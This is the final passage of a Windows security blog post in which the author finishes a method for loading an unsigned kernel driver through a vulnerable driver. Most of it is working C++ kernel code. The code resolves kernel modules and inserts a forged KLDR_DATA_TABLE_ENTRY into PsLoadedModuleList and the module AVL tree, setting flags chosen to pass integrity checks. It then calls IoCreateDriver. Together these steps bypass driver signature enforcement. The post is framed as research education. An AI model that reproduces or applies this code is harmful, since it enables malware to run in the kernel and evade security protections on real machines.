IMAGE_DOS_HEADER* pDosHeader = reinterpret_cast<IMAGE_DOS_HEADER*>(&__ImageBase);
IMAGE_NT_HEADERS* pNtHeader = reinterpret_cast<IMAGE_NT_HEADERS*>(reinterpret_cast<UCHAR*>(&__ImageBase) + pDosHeader->e_lfanew);

// Call RtlInsertInvertedFunctionTable 
pfnRtlInsertInvertedFunctionTable(&__ImageBase, pNtHeader->OptionalHeader.SizeOfImage);

Where __ImageBase is a special psuedo-variable provided by the MSVC linker, you can read about it here but we just have to define:

extern "C" VOID * __ImageBase;

And we have implemented get_module_address like so, which you may notice looks very similar to our KGetModuleHandle we implemented in user-mode:

void* get_module_address(const char* name)
{
    void* retval = nullptr;

    ULONG returnLength = 0;

    ULONG bufferSize = 10;
    void* buffer = ExAllocatePool2(POOL_FLAG_PAGED, bufferSize, 'xxxx');

    NTSTATUS status = ZwQuerySystemInformation(SystemModuleInformation, buffer, bufferSize, &returnLength);

    while (STATUS_INFO_LENGTH_MISMATCH == status)
    {
        // Free the old buffer
        ExFreePool(buffer);

        // Allocate the newer bigger one
        bufferSize = returnLength;
        returnLength = 0;
        buffer = ExAllocatePool2(POOL_FLAG_PAGED, bufferSize, 'xxxx');

        // Try again
        status = ZwQuerySystemInformation(SystemModuleInformation, buffer, bufferSize, &returnLength);
    }

    if (NT_SUCCESS(status))
    {
        RTL_PROCESS_MODULES* pModules = reinterpret_cast<RTL_PROCESS_MODULES*>(buffer);

        for (ULONG i = 0; i < pModules->NumberOfModules; i++)
        {
            if (0 == _stricmp(name, reinterpret_cast<char*>(&pModules->Modules[i].FullPathName[0]) + pModules->Modules[i].OffsetToFileName))
            {
                retval = pModules->Modules[i].ImageBase;
                break;
            }
            
        }
    }

    ExFreePool(buffer);

    return retval;
}

It turns out the API ZwQuerySystemInformation also exists in kernel and also allows us to query modules loaded in kernel. It returns an identical set of structures to the user-mode API:

typedef struct _RTL_PROCESS_MODULES
{
    ULONG NumberOfModules;
    RTL_PROCESS_MODULE_INFORMATION Modules[1];
} RTL_PROCESS_MODULES, * PRTL_PROCESS_MODULES;

Where the information we get for each module is:

typedef struct _RTL_PROCESS_MODULE_INFORMATION
{
    HANDLE Section;
    PVOID MappedBase;
    PVOID ImageBase;
    ULONG ImageSize;
    ULONG Flags;
    USHORT LoadOrderIndex;
    USHORT InitOrderIndex;
    USHORT LoadCount;
    USHORT OffsetToFileName;
    UCHAR FullPathName[256];
} RTL_PROCESS_MODULE_INFORMATION, * PRTL_PROCESS_MODULE_INFORMATION;

Which handily allows us to find the address of any kernel module from within kernel too!

Right, I promise you that we’re on the final straight now! The last few steps are just to add ourselves into some structures to enable some Windows APIs to see us as a valid and loaded driver.

Step 1: Insert ourselves into the PsLoadedModuleList.

Step 2: Insert ourselves into the AVL tree that indexes the same loaded modules represented by the PsLoadedModuleList. This is just a more optimized structure for searching modules that is used by some of the newer Windows APIs.

For the call to IoCreateDriver, which will trigger a call to our DriverEntry routine we must have a corresponding entry in the PsLoadedModuleList. This is a doubly linked list of KLDR_DATA_TABLE_ENTRY structures representing all of the loaded kernel drivers. The structure looks something like:

struct _KLDR_DATA_TABLE_ENTRY
{
    struct _LIST_ENTRY InLoadOrderLinks;                                    //0x0
    VOID* ExceptionTable;                                                   //0x10
    ULONG ExceptionTableSize;                                               //0x18
    VOID* GpValue;                                                          //0x20
    struct _NON_PAGED_DEBUG_INFO* NonPagedDebugInfo;                        //0x28
    VOID* DllBase;                                                          //0x30
    VOID* EntryPoint;                                                       //0x38
    ULONG SizeOfImage;                                                      //0x40
    struct _UNICODE_STRING FullDllName;                                     //0x48
    struct _UNICODE_STRING BaseDllName;                                     //0x58
    ULONG Flags;                                                            //0x68
    USHORT LoadCount;                                                       //0x6c
    union
    {
        USHORT SignatureLevel : 4;                                            //0x6e
        USHORT SignatureType : 3;                                             //0x6e
        USHORT Frozen : 2;                                                    //0x6e
        USHORT HotPatch : 1;                                                  //0x6e
        USHORT Unused : 6;                                                    //0x6e
        USHORT EntireField;                                                 //0x6e
    } u1;                                                                   //0x6e
    VOID* SectionPointer;                                                   //0x70
    ULONG CheckSum;                                                         //0x78
    ULONG CoverageSectionSize;                                              //0x7c
    VOID* CoverageSection;                                                  //0x80
    VOID* LoadedImports;                                                    //0x88
    union
    {
        VOID* Spare;                                                        //0x90
        struct _KLDR_DATA_TABLE_ENTRY* NtDataTableEntry;                    //0x90
    };
    ULONG SizeOfImageNotRounded;                                            //0x98
    ULONG TimeDateStamp;                                                    //0x9c
    // 0xA0
    /*
        Later on we need to insert ourselves into an AVL tree
        and from what I can tell the node structure should be
        allocated in the same memory block as this KLDR structure.
        Based on the function which uses the AVL tree
        MiLookupDataTableEntry it looks like there should be
        an RTL_BALANCED_NODE structure at offset 0xE8 but this
        isn't present in the private symbols (the structure
        is only 0xA0 bytes long). So we manually extend this
        struct to have a node at the correct location
    */
    VOID* unknown[9];
    _RTL_BALANCED_NODE atlNode;
};

And the code for inserting ourselves into both of these structures is as follows:

// Let's start with the PsLoadedModuleList insertion

// We need to look up some publicly exported symbols which can be done using MmGetSystemRoutineAddress
UNICODE_STRING psLoaded = RTL_CONSTANT_STRING(L"PsLoadedModuleList");
UNICODE_STRING psResource = RTL_CONSTANT_STRING(L"PsLoadedModuleResource");

// PsLoadedModuleList is the list head
_KLDR_DATA_TABLE_ENTRY* PsLoadedModuleList = reinterpret_cast<_KLDR_DATA_TABLE_ENTRY*>(MmGetSystemRoutineAddress(&psLoaded));
// PsLoadedModuleResource is the ERESOURCE structure which is essentially a reader/writer lock for the PsLoadedModuleList 
// You can read about ERESOURCE structures here: https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/introduction-to-eresource-routines
PERESOURCE PsLoadedModuleResource = reinterpret_cast<PERESOURCE>(MmGetSystemRoutineAddress(&psResource));

// Lock the ERESOURCE so we can insert ourselves safely
ExAcquireResourceSharedLite(PsLoadedModuleResource, TRUE);

// Allocate our own KLDR_DATA_TABLE_ENTRY structure
_KLDR_DATA_TABLE_ENTRY* ldrDataTableEntry = reinterpret_cast<_KLDR_DATA_TABLE_ENTRY*>(ExAllocatePool2(POOL_FLAG_NON_PAGED, sizeof(_KLDR_DATA_TABLE_ENTRY), 'xxxx'));

// Set our dll base address
ldrDataTableEntry->DllBase = &__ImageBase;
// Set our size of image
ldrDataTableEntry->SizeOfImage = pNtHeader->OptionalHeader.SizeOfImage;
/*
    Set some flags:
    
    I believe these were mostly copied from a legit set of flags from a real structure in an attached kernel debugger but 
    I think the key flag here is 0x20 which is some integrity check bit flag, although these are rather undocumented. From
    what I could find this flag apprently indicates that the driver was built with the /INTEGRITYCHECK linker flag which in turn
    sets the dll characteristic IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY which tells the memory manager to check for a digital
    signature in order to load the image in Windows. In any case, its required to pass some Kernel API checks.
*/
ldrDataTableEntry->Flags = 0x49104020;

// Insert ourselves into the PsLoadedModuleList doubly linked list
InsertTailList(&PsLoadedModuleList->InLoadOrderLinks, &ldrDataTableEntry->InLoadOrderLinks);

// Right, now let's get ourself inserted into the AVL tree
UNICODE_STRING rtlAvlInsert = RTL_CONSTANT_STRING(L"RtlAvlInsertNodeEx");
using fnRtlAvlInsertNodeEx = VOID(NTAPI*)(RTL_BALANCED_NODE** Tree, RTL_BALANCED_NODE* Parent, BOOLEAN Right, RTL_BALANCED_NODE* Node);
fnRtlAvlInsertNodeEx pfnRtlAvlInsertNodeEx = reinterpret_cast<fnRtlAvlInsertNodeEx>(MmGetSystemRoutineAddress(&rtlAvlInsert));

// We now have the function to insert ourself but we have to do the work to figure out where we're supposed to be inserted

// Grab a pointer to the tree root from using the rva in our kernel offsets structure
void* pAvlTreeRoot = reinterpret_cast<void*>(reinterpret_cast<char*>(pNtosBase) + _KernelOffsets.rvaAvlTreeRoot);

// Save off the tree root in pNode and set our iterator there too
RTL_BALANCED_NODE* pNode = *reinterpret_cast<RTL_BALANCED_NODE**>(pAtlTreeRoot);
RTL_BALANCED_NODE* iterator = pNode;
// We also need a spare iterator for a look-ahead
RTL_BALANCED_NODE* iteratorSpare = nullptr;
// Keep track of which branch of the tree we need insertion into
BOOLEAN right = FALSE;

// Let's walk the tree
while (TRUE)
{
    // Grab the KLDR_DATA_TABLE_ENTRY strcuture corresponding to this node
    _KLDR_DATA_TABLE_ENTRY* pLdrData = CONTAINING_RECORD(iterator, _KLDR_DATA_TABLE_ENTRY, atlNode);
    
    // Grab the image base and image size
    VOID* imageBase = pLdrData->DllBase;
    ULONG imageSize = pLdrData->SizeOfImage;
    
    // Compute the comparator for figuring out which branch we need to go down
    VOID* comparator = reinterpret_cast<UCHAR*>(imageBase) + imageSize - 1;

    if (&__ImageBase <= comparator)
    {
        /*
            The kernel checks to see if the image base being inserted is >=
            to the image base but <= image end address of the current node
            because that would indicate something is being added again.

            Because we're adding ourselves and we know we're not already in the tree
            we're going to assume that being <= to the image end address indicates
            we're at a lower memory address than the current node because we're sure
            we're not the current node
        */

        // Move left in the tree
        iteratorSpare = iterator->Left;

        if (NULL == iteratorSpare)
        {
            // We've moved to an empty left node so when we insert
            // indicate that we want to insert into the left spare
            right = FALSE;
            break;
        }
    }
    else
    {
        // We must be loaded at a higher address so move right
        iteratorSpare = iterator->Right;

        if (NULL == iteratorSpare)
        {
            // We've moved to an empty right node so when we insert
            // indicate that we want to insert into the right spare
            right = TRUE;
            break;
        }
    }

    // Actually advance the iterator now we've done the forward lookahead
    iterator = iteratorSpare;
}

// We found an empty slot to insert ourselves into so let's call RtlAvlInsertNodeEx!
// Here we pass the tree root, the node we want to be inserted into, a bool indicating which child to be connected to i.e. left or right
// and finally the node of our own new fake KLDR_DATA_TABLE_ENTRY.
pfnRtlAvlInsertNodeEx(reinterpret_cast<RTL_BALANCED_NODE**>(pAtlTreeRoot), iterator, right, &ldrDataTableEntry->atlNode);
    
// Finally release the ERESOURCE lock
ExReleaseResourceLite(PsLoadedModuleResource);

Okay, that’s it! At this point we should be inserted in both the AVL tree and the doubly-linked list structures representing all loaded kernel modules. Finally, we can call IoCreateDriver!

UNICODE_STRING ioCreate = RTL_CONSTANT_STRING(L"IoCreateDriver");
using fnIoCreateDriver = NTSTATUS(NTAPI*)(PUNICODE_STRING DriverName, DRIVER_INITIALIZE InitializationFunction);
fnIoCreateDriver pfnIoCreateDriver = reinterpret_cast<fnIoCreateDriver>(MmGetSystemRoutineAddress(&ioCreate));

// Passing a name isn't mandatory, remember, objects managed by the object manager don't have to have a name
// & given we talk to the driver via the device's symbolic link this fine. Finally here we can pass it the
// address of our actual DriverEntry routine to be called properly
pfnIoCreateDriver(nullptr, &DriverEntry);

Wooo, we’re done! 🥳

That’s it, we’re finally done! We’ve loaded an unsigned driver into kernel using a vulnerable driver!

Its honestly taken me so long to write all of this knowledge and process up so thank you to any readers that made it this far, I really hope you gained/learned something from this blog and I fully appreciate that its almost a novel at this point so getting this far is no easy feat. If you did make it this far please don’t hesitate to reach out to me via email and let me know your thoughts, was there anything I missed or got wrong, anything I skipped over too much and wasn’t clear etc. Anyway, thank you, and congratulations on making it through this behemoth of a blog post!

Catch you next time when I’ll be back with something a bit more short form for my own sanity!

The Malware Man

A security researcher who specialises in Windows